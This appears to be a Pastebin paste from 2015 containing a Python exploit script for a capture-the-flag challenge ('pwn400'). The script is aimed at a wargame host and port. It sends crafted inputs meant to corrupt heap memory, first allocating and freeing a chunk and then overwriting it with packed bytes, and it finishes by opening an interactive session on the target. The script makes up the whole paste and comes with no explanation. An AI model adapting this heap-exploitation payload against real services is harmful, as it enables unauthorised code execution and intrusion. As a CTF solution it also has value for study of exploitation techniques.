API tools faq
paste
Advertisement
Guest User

pwn400_2

a guest
Apr 26th, 2015
362
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.02 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2.  
  3. from Pwning import *
  4.  
  5. class Pwn400(Payload):
  6. def __init__(self):
  7. Payload.__init__(self)
  8. self.host[1] = 'lab33.wargame.whitehat.vn' # my Target host
  9. self.port = 9400 # my Target port
  10. self.mode = 1 # x86 target platform
  11. # self.mode = 1 x86_64 target platform
  12. self.conn = Telnet(self.host[1],self.port)
  13.  
  14. def pwnTarget(self):
  15. input1 = "u#" + "A"*1022 # create heap with size 0x410, and free it
  16. input2 = "o<1060>" + "\x00\x80"*7 + "\x00\x88" + "\x00\x10" + "\x56\x01" + "\x08\x01" + "\x40\x01"
  17. input2+= "\x00\x05" + "B"*(1024 - len(input2))
  18.  
  19. self.conn.read_until('Input string 1\n')
  20. self.conn.writeRawData(input1)
  21. self.conn.read_until('Input string 2\n')
  22. self.conn.writeRawData("AA#" + "D"*1021)
  23.  
  24. self.conn.read_until('Processing\n')
  25.  
  26. self.conn.read_until('Input string 1\n')
  27. self.conn.writeRawData(input2)
  28. self.conn.read_until('Input string 2\n')
  29. self.conn.writeRawData("B"*1024)
  30.  
  31. self.conn.interact()
  32. self.conn.close()
  33.  
  34. pwn400 = Pwn400()
  35. pwn400.pwnTarget()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!